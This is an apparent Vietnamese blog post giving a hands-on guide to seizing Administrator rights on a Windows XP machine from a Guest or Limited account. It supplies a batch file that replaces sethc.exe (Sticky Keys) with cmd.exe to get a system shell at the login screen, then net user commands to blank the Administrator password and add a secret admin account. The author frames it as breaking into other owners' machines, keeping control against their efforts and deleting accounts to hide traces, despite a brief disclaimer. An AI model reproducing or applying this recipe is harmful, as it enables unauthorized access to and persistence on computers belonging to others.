Đoạt quyền Administrator trong Windows XP bằng tay không

Bài viết này hướng dẫn lấy password Quản trị của máy tính trong trường hợp các bạn cần sử dụng máy tính ở quyền Admin trong khi chỉ được phép sử dụng máy ở dạng … Guest hay Limited. Không khuyến khích đi phá hoại máy tính người khác.

Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản Administrator trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu gặp những lúc như thế…. hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows.

Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).

Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình Notepad.exe. Copy đoạn mã của mình viết, past vào notepad, Save lại với tên là Hackpass.bat

CODE
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y

Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!

Đoạn mã này làm các nhiệm vụ sau:

1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe

Đến đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bạn đang có toàn quyền với hệ thống với cửa sổ Command Run này. Chú ý là bạn sẽ không thực hiện được các bước tiếp theo nếu thao tác trên cửa sổ Command Run trong tài khoản Guest hay Limited mà không Log off nó như mình vừa lưu ý.

Chương trình StickyKey đã được thay bằng Command Run

Thật ra, với cách này, các bạn có thể biến đổi tùy ý các Users trên máy, kể cả các Admin khác. Muốn đổi pw một user có sẵn trong máy, ta xem có những users nào đang có trên máy (kể cả users ẩn):

CODE
net user

Xóa trắng password của Administrator (hay tương tự với bất kì user nào):
CODE
net user Administrator

Thêm một tài khoản ForumHungYen với mật khẩu là 123
CODE
net user ForumHungYen 123 /add

Gán tài khoản ForumHungYen vào nhóm quản trị (sau bước này tài khoản ForumHungYen mới có quyền Adminitrators):
CODE
net localgroup Administrators ForumHungYen /add

Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!

Sau khi dùng xong tài khoản ForumHungYen, xóa nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còn trong máy, để sau này … tạo lại user … dùng tiếp (kể ra ai tinh ý sẽ thấy nó).
CODE
net user ForumHungYen /delete

Cuối cùng, nếu thư mục system32 được bảo vệ bằng soft tương tự Folder Lock, thì các bạn phải Reset acc Admin bằng Hiren’s Boot CD. Khi reset xong Adminitrators pw, ta có thể chạy file Hackpass.bat ở trên trong Safe Mode (đảm bảo việc sao lưu và đổi tên không có gì cản trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ Shift 5 lần là sẽ có cửa sổ Command cho ta … tùy ý thao tác…
Tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ sẽ có những thay đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm nhập máy họ, nhưng nếu cmd.exe (đã đổi tên) vẫn tồn tại trong System32, thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo mới acc Admin xong, nhớ xóa đi để xóa dấu vết.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: